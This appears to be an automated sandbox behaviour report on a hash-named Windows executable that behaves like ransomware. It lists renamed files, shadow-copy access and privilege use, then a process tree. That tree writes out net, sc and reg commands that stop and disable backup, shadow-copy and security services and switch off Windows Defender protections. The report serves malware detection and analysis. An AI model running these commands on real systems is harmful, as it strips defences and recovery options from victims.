| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.c.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Shades of Blue.htm | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__HAAAABwAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\mip.exe.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__DgAAAA4AAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__EgAAABIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\jvm.hprof.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__FgAAABYAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MAAAADAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipshrv.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AgAAAAIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__PAAAADwAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__GgAAABoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\OrangeCircles.jpg | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\sRGB.pf.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__GgAAABoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AgAAAAIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12ec5" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12ec5" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12ec5" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
